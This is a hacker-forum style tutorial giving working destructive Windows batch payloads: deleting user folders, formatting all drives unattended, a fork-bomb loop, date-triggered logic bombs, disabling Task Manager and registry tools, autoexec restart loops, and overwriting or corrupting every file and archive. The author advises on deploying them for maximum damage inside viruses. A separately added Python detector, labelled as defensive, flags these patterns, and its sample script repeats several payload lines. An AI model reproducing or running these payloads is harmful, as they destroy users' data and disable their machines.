TUTORIAL: AwEsOmE BaTcH PaYlOaDs
by cOrRuPt G3n3t!x

Welcome to my 6th tutorial. In my last 5 we have discussed many things such as Polymorphism, Spreading, Startup Methods, Anti-AV Techniques and even a Theory on Batch Keylogging! Today I would like to discuss some possible payloads in batch. Things such as keyboard disable and mouse disable cannot be used any more because Vista no longer supports them, but read on further, I might just have come up with a new technique ;)

I will admit, I'm not really into destructive payloads such as formatting C:\ drives etc., I just don't like 'em, but I will be putting my dislikes aside and show you all the great methods I know and/or have seen in practice.

1) Random Directory Maker (RDM):
--------------------------------
This will make random folders in the current directory. You can manipulate it by giving a path before the random part to make it go to a specific path:
-------------------------------[Cut Here]--------------------------------------
@echo off
md %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
md %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
md %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
md %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
md %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
md %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
md %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
md %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
md %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
md %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
md %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
md %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
md %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
md %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
-------------------------------[Cut Here]--------------------------------------

2) User Specific Deletion (USD):
--------------------------------
This method will delete the user's Documents, Pictures, Videos, Music and Downloads on a Windows Vista system; it can be changed to do the same for XP:
-------------------------------[Cut Here]--------------------------------------
@echo off
DEL /F /Q %UserProfile%\Documents\*.* >nul
DEL /F /Q %UserProfile%\Pictures\*.* >nul
DEL /F /Q %UserProfile%\Videos\*.* >nul
DEL /F /Q %UserProfile%\Downloads\*.* >nul
DEL /F /Q %UserProfile%\Music\*.* >nul
-------------------------------[Cut Here]--------------------------------------

3) Windows CrAsh/FreEzE:
------------------------
This is the age-old method of starting up CMD.exe in a loop and slowing the computer down to a halt! All it will do is call up CMD.exe in a loop. My computer never crashed, but I could not operate it and had to reset (if this is considered a virus/payload it's the smallest I've ever seen, 17 bytes to be exact):
-------------------------------[Cut Here]--------------------------------------
:a
start
goto a
-------------------------------[Cut Here]--------------------------------------

4) Formatting:
--------------
This will delete all data on backup and shared drives; however, it will not format the drive running Windows! You can change the file system type from NTFS to UDF etc. Just type 'Format /?' in CMD.exe for more info (although most new HDDs use NTFS):
-------------------------------[Cut Here]--------------------------------------
@echo off
FORMAT A: /FS:NTFS /V:(A:) /X /P:1 /y >nul
FORMAT B: /FS:NTFS /V:(B:) /X /P:1 /y >nul
FORMAT C: /FS:NTFS /V:(C:) /X /P:1 /y >nul
FORMAT Z: /FS:NTFS /V:(Z:) /X /P:1 /y >nul
FORMAT E: /FS:NTFS /V:(E:) /X /P:1 /y >nul
FORMAT F: /FS:NTFS /V:(F:) /X /P:1 /y >nul
FORMAT G: /FS:NTFS /V:(G:) /X /P:1 /y >nul
FORMAT H: /FS:NTFS /V:(H:) /X /P:1 /y >nul
FORMAT I: /FS:NTFS /V:(I:) /X /P:1 /y >nul
FORMAT J: /FS:NTFS /V:(J:) /X /P:1 /y >nul
FORMAT K: /FS:NTFS /V:(L:) /X /P:1 /y >nul
FORMAT M: /FS:NTFS /V:(M:) /X /P:1 /y >nul
FORMAT N: /FS:NTFS /V:(N:) /X /P:1 /y >nul
FORMAT O: /FS:NTFS /V:(O:) /X /P:1 /y >nul
FORMAT P: /FS:NTFS /V:(P:) /X /P:1 /y >nul
FORMAT Q: /FS:NTFS /V:(Q:) /X /P:1 /y >nul
FORMAT R: /FS:NTFS /V:(R:) /X /P:1 /y >nul
FORMAT S: /FS:NTFS /V:(S:) /X /P:1 /y >nul
FORMAT T: /FS:NTFS /V:(T:) /X /P:1 /y >nul
FORMAT U: /FS:NTFS /V:(U:) /X /P:1 /y >nul
FORMAT V: /FS:NTFS /V:(V:) /X /P:1 /y >nul
FORMAT W: /FS:NTFS /V:(W:) /X /P:1 /y >nul
FORMAT X: /FS:NTFS /V:(Y:) /X /P:1 /y >nul
FORMAT Z: /FS:NTFS /V:(Z:) /X /P:1 /y >nul
-------------------------------[Cut Here]--------------------------------------

Next we will look at formatting USBs and D: drives. Although I will give all the possible locations of the USB and D: drives, it is very unlikely they'll be found anywhere else on other PCs, as usually D: is D, and E:, F:, G: and H: are USB; C:, Z: etc. are drives. Take that into account before just adding all the code to it!!:
-------------------------------[Cut Here]--------------------------------------
format A: /y >nul
format B: /y >nul
format C: /y >nul
format D: /y >nul
format E: /y >nul
format F: /y >nul
format G: /y >nul
format H: /y >nul
format I: /y >nul
format J: /y >nul
format K: /y >nul
format L: /y >nul
format M: /y >nul
format N: /y >nul
format O: /y >nul
format P: /y >nul
format Q: /y >nul
format R: /y >nul
format S: /y >nul
format T: /y >nul
format U: /y >nul
format V: /y >nul
format W: /y >nul
format X: /y >nul
format Y: /y >nul
format Z: /y >nul
-------------------------------[Cut Here]--------------------------------------

It is important to note that it does take a few minutes to format USBs, D: drives etc., so it would be clever to put the formatting at the end of your virus routine, because even if it just starts formatting and the user cancels it, the disk, drive or USB will still need to be formatted properly before it can be used. You could also make a sort of logic bomb that will set the computer to format on a given day and month, see below:
-------------------------------[Cut Here]--------------------------------------
If %date% NEQ 2009/08/14 goto exit
format E: /y >nul
:exit
exit
-------------------------------[Cut Here]--------------------------------------

5) Disable Registry Tools and Taskmgr.exe:
------------------------------------------
This is an extremely annoying payload. Once activated the user will not be able to access any Reg tools such as REGEDIT.exe, and this includes others among them CMD.exe and Taskmgr.exe! This also means no batch, script or .reg program can run!!! So it is important not to activate this until your virus has done its job; this is perfect for self-destructing virii, as it can disable these tools when it deletes itself from the user's system:
-------------------------------[Cut Here]--------------------------------------
reg add hkcu\software\microsoft\windows\currentversion\policies\system /v disabletaskmgr /t reg_dword /d "1" /f
reg add hkcu\software\microsoft\windows\currentversion\policies\system /v disableregistrytools /t reg_dword /d "1" /f
-------------------------------[Cut Here]--------------------------------------

6) Swap Mouse Buttons (SMB):
----------------------------
This method was used a lot in older Windows, but now with Vista it does not work anymore. I have, however, found another method via the registry; just remember a restart is required for it to take effect:
-------------------------------[Cut Here]--------------------------------------
REG ADD "HKU\S-1-5-21-3199511022-2964655342-1435898374-1000\Control Panel\Mouse" /v SwapMouseButtons /t REG_SZ /d 1 /f
-------------------------------[Cut Here]--------------------------------------
I have just figured out after 15 minutes that if a reg key has a space in its name, such as the above, you must use quotation marks ( "reg key value" ) ;[!

7) Time & Date Changer:
-----------------------
This, as the name suggests, will change the time and date of the computer on every start-up:
-------------------------------[Cut Here]--------------------------------------
attrib -r -h C:\autoexec.bat
echo.Time 00:00:00>>C:\autoexec.bat
echo.Date 45/04/11>>C:\autoexec.bat
attrib +r +h C:\autoexec.bat
-------------------------------[Cut Here]--------------------------------------

8) Windows Restart Loop:
------------------------
This will set the user's PC in a restart loop. Changing /t 02 to /t 00 will make an immediate shutdown, whereas /t 02 will wait 2 seconds before shutdown. Type 'shutdown /?' in CMD.exe for more information:
-------------------------------[Cut Here]--------------------------------------
attrib -r -h C:\autoexec.bat
echo.shutdown -r /t 02 /c "You are infected with a virus!!">>C:\autoexec.bat
attrib +r +h C:\autoexec.bat
-------------------------------[Cut Here]--------------------------------------

9) Internal Clock Overwrite (ICO):
----------------------------------
PLEASE DO NOT TEST ON YOUR PC!! I HAVE NOT TESTED ON MINE BUT IT SHOULD WORK, I WILL NOT BE RESPONSIBLE FOR ANY USER STUPIDITY!!!!!! And a big thanks to Dvl for this. This will overwrite your internal DOS variable clock$ and will then crash the user's computer with a stack overflow. When the PC reboots, depending on the BIOS you are using, the BIOS will be filled with garbage; on other BIOSes it will only affect the date and time! There are all sorts of internal variables that you can overwrite with the echo command. To get a list of these type 'mem /d':
-------------------------------[Cut Here]--------------------------------------
Echo 123>clock$
-------------------------------[Cut Here]--------------------------------------
I have also provided a few other ones:
-------------------------------[Cut Here]--------------------------------------
echo 123>CON
echo 123>AUX
echo 123>PRN
echo 123>COM1
echo 123>COM2
echo 123>COM3
echo 123>COM4
-------------------------------[Cut Here]--------------------------------------

10) File Execution:
-------------------
This will open up images, websites, MP3s and anything else you want; just change the name and location of your specific file (inspired by Dvl's method):
-------------------------------[Cut Here]--------------------------------------
explorer.exe C:\pic.jpg
explorer.exe C:\Immortal_technique.mp3
explorer.exe http://pornhub.com
-------------------------------[Cut Here]--------------------------------------

11) BAT/Silly.D Virus revamp:
-----------------------------
We all know this simple DOS virus, but now I have taken it a step further: it will overwrite all files and make them unusable (another thanx to Dvl):
-------------------------------[Cut Here]--------------------------------------
echo.fUcK tHe SySt3m>>%Temp%\FTS.tmp
for %%a in (*.*) do copy %temp%\FTS.tmp %%a >nul
-------------------------------[Cut Here]--------------------------------------

12) Payload Activation Technique (PAT):
---------------------------------------
This will show you how to let your payload activate on a certain date or when parameters are met. In the example below it will check if the current date is equal to the date I set; if not, it will exit, and if it is, it will run the code:
-------------------------------[Cut Here]--------------------------------------
If %date% NEQ 2009/08/14 goto exit
"Your virus payload here"
:exit
exit
-------------------------------[Cut Here]--------------------------------------

13) File Compression Corruption:
--------------------------------
This is my very own technique that gels extremely well with my name (cOrRuPt G3n3t!x) haha, and now I'ma teach you how to corrupt all types of compressed files (.zip, .7z, .rar etc.). It is extremely simple though, as it works on the basis that I copy an uncompressed file straight into a compressed file, thus Windows will not be able to extract it and it will display a message similar to 'This file is corrupted':
-------------------------------[Cut Here]--------------------------------------
echo.corrupt compressed files now!!!>>%temp%\cg.tmp
for %%a in (*.zip *.7z *.tar *.rar *gz *.bz2) do set a=%%a
copy %temp%\cg.tmp %a% >nul
del %temp%\cg.tmp
-------------------------------[Cut Here]--------------------------------------

Well, you've come to the end of my next tutorial. Some techniques I've shown here are kinda new, so have fun. If you have any queries or problems you need help with (I'm talking about batch problems, not personal :)) then drop me some mail!

PS. This is for educational purposes only! Do not distribute with intention to do harm!

Now Batch Up !!!!! ;)

[?]Contact Me:
--------------
[@]immortalassassin@rocketmail.com
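As an added example from the defender's side, not part of this tutorial or its author's code: a small Python triage script that flags the payload families collected above when it sees them in a .bat/.cmd file (unattended format, %UserProfile% deletion, the two policy values from section 5, the HKU mouse swap, autoexec.bat persistence, restart commands, writes to clock$ and the other reserved devices, the for/copy overwrite loop, date gates and the three-line start loop). The signature names, severities and the embedded sample script are my own construction; it inspects text only and never executes anything.

```python
import re

# Added example for defenders (not the tutorial's code). Signature names are
# mine; each regex runs over a lower-cased, whitespace-collapsed line.
SIGNATURES = [
    ("format_unattended", "critical", r"^format [a-z]:.* /y(\s|$)"),
    ("del_user_profile", "critical", r"^del .*/q.*%userprofile%\\"),
    ("policy_disable_tools", "high",
     r'^reg add .*\\policies\\system"? /v (disabletaskmgr|disableregistrytools)\b'),
    ("hku_mouse_swap", "medium",
     r'^reg add "hku\\s-1-5-21-[\d-]+\\control panel\\mouse" .*swapmousebuttons'),
    ("autoexec_persist", "high", r">> ?c:\\autoexec\.bat$"),
    ("restart_cmd", "medium", r"^(echo\.)?shutdown [-/]r\b"),
    ("device_write", "medium", r">(clock\$|con|aux|prn|com[1-4])$"),
    ("overwrite_loop", "critical", r"^for %%?\w in \(.*\*.*\) do copy "),
    ("date_gate", "info", r"^if %date% (neq|equ) \S+ goto "),
]
COMPILED = [(n, s, re.compile(p)) for n, s, p in SIGNATURES]
RANK = {"info": 0, "medium": 1, "high": 2, "critical": 3}

def scan_batch(text):
    """Return sorted [(line_no, signature, severity)] for a .bat/.cmd text."""
    lines = [" ".join(l.lower().split()) for l in text.splitlines()]
    findings = [(no, n, s) for no, line in enumerate(lines, 1)
                for n, s, rx in COMPILED if rx.search(line)]
    # The 17-byte ':a / start / goto a' loop needs three-line context.
    for i in range(1, len(lines) - 1):
        if (lines[i] == "start" and lines[i - 1].startswith(":")
                and lines[i + 1] == "goto " + lines[i - 1][1:]):
            findings.append((i + 1, "start_loop", "high"))
    return sorted(findings)

def verdict(findings):
    """Highest severity among the findings, or 'clean' when there are none."""
    return max((s for _, _, s in findings), key=RANK.get, default="clean")

# Constructed sample: lines lifted from the tutorial mixed with a benign one.
SAMPLE = r"""@echo off
echo Backing up logs...
If %date% NEQ 2009/08/14 goto exit
DEL /F /Q %UserProfile%\Documents\*.* >nul
reg add hkcu\software\microsoft\windows\currentversion\policies\system /v disabletaskmgr /t reg_dword /d "1" /f
format E: /y >nul
:a
start
goto a
"""

if __name__ == "__main__":
    for no, name, sev in scan_batch(SAMPLE):
        print(f"line {no:>3}  {sev:<8}  {name}")
    print("verdict:", verdict(scan_batch(SAMPLE)))
```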